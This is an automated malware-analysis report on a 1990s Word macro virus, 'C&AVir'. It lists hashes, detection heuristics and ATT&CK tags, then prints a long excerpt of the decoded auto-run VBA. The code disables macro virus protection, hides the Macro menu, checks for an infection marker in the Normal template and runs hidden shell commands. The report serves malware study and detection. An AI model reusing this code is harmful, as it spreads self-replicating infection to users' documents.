Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7a20b06a860880ff…

MALICIOUS

Office (OLE)

49.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7ed115aab536f1530191bc71c5fcec57 SHA-1: 04988380794eacdfab9c6cfc5a895619e7f81cac SHA-256: 7a20b06a860880ff9e076ebaa162f57da168cd1af200de50615d79f28965193d
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a VBA macro that is automatically executed via the Document_Open subroutine. This macro attempts to disable virus protection and then uses the Shell() function to execute commands. The script also appears to be designed to download and execute further payloads, indicated by the presence of file extension patterns like '*.doc', '*.bat', and '*.sys' and the truncated code suggesting payload delivery.

Heuristics 5

  • ClamAV: Doc.Trojan.Marker-42 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-42
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 42930 bytes
SHA-256: 055e23ec01d11cc956d14581287c8d74c28c91322e3e4a143ed6112d81f60d12
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
  'New Era of C&AVir. More Powerfull
  On Error Resume Next
  Dim Sw_Doc_Infec, Sw_Pln_Infec, Activa_Doc, Activa_Pln, Acci_Arch, Rompe As Boolean
    Set prevDocument = NormalTemplate
    Set nextDocument = newDocument
  Dim Accion1, Accion2, LinDoc, LinPln, Compara As Integer
  Const cyav = "Este Es <C&AVir>"
  Const pnomus = "***< C & A V i r >***"
  'Inicializa Variables
  Sw_Doc_Infec = False
  Sw_Pln_Infec = False
Activa_Doc = True
Activa_Pln = False
  CommandBars("Tools").Controls("Macro").Enabled = False
  CommandBars("Tools").Controls("Macro").Visible = False
  Options.VirusProtection = (1 - 1)
  Options.SaveNormalPrompt = (1 - 1)
  Options.ConfirmConversions = (1 - 1)
  Options.CreateBackup = (1 - 1)
  Set Dc = ActiveDocument.VBProject.VBComponents.Item(1)
  Set Pl = NormalTemplate.VBProject.VBComponents.Item(1)
  LinPln = Pl.CodeModule.Countoflines
  LinDoc = Dc.CodeModule.Countoflines
  Sw_Pln_Infec = Pl.CodeModule.Find(cyav, 1, 1, 10000, 10000)
  Sw_Doc_Infec = Dc.CodeModule.Find(cyav, 1, 1, 10000, 10000)
  Acci_Arch = False
  Randomize
  If Activa_Doc = True Then
    If Date > 36433 Then
      Dia = Day(Date)
      If Dia = 1 Then
        Ptp = Int(6 * Rnd)
        Select Case Ptp
          Case 1
            Acci_Arch = True
            pext = "*.doc"
            pext1 = "1"
          Case 2
            Acci_Arch = True
            pext = "*.bat"
            pext1 = "2"
          Case 3
            Acci_Arch = True
            pext = "*.sys"
            pext1 = "3"
          Case 4
            Acci_Arch = False
            pext = ""
            pext1 = ""
          Case 5
            Acci_Arch = True
            pext = "*.ini"
            pext1 = "4"
        End Select
        If Acci_Arch = True Then
          parchi = "IOBuff" & pext1 & ".vxd"
          Shell "command.com /c dir \" & pext & "/s/b>>\" & parchi, vbHide
        End If
      End If
      DiaSem = WeekDay(Date)
      DiaSem = DiaSem + 3
      Hacer = Int(DiaSem * Rnd)
      If Hacer = Day(Now) Or (Hacer * 3) = Minute(Now) Then
        Select Case Hacer
          Case 1
            Options.BlueScreen = True
            Options.CheckGrammarAsYouType = False
            Options.CheckSpellingAsYouType = False
            ActiveDocument.ShowGrammaticalErrors = False
            ActiveDocument.ShowSpellingErrors = False
            ActiveDocument.CommandBars.LargeButtons = True
            Application.ActiveWindow.DisplayVerticalScrollBar = False
          Case 2
            With ActiveDocument.PageSetup.LineNumbering
                 .Active = True
                 .StartingNumber = 3
                 .CountBy = 3
                 .RestartMode = wdRestartSection
            End With
            ActiveDocument.Save
            If ActiveDocument.CommandBars.LargeButtons = True Then ActiveDocument.CommandBars.LargeButtons = False
            ActiveDocument.ActiveWindow.Caption = ActiveDocument.ActiveWindow.Caption & " - Pura Basura!!"
            If ActiveDocument.Saved = False Then ActiveDocument.Save
          Case 3
            With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).PageNumbers
                 .NumberStyle = wdPageNumberStyleLowercaseRoman
                 .IncludeChapterNumber = True
                 .RestartNumberingAtSection = True
                 .StartingNumber = 99
                 .Add PageNumberAlignment:=wdAlignPageNumberCenter, FirstPage:=True
            End With
            Application.ActiveWindow.DisplayHorizontalScrollBar = False
            Application.ActiveWindow.DisplayVerticalScrollBar = False
            If ActiveDocument.Saved = False Then ActiveDocument.Save
            If Options.BlueScreen = True Then Options.BlueScreen = False
      
... (truncated)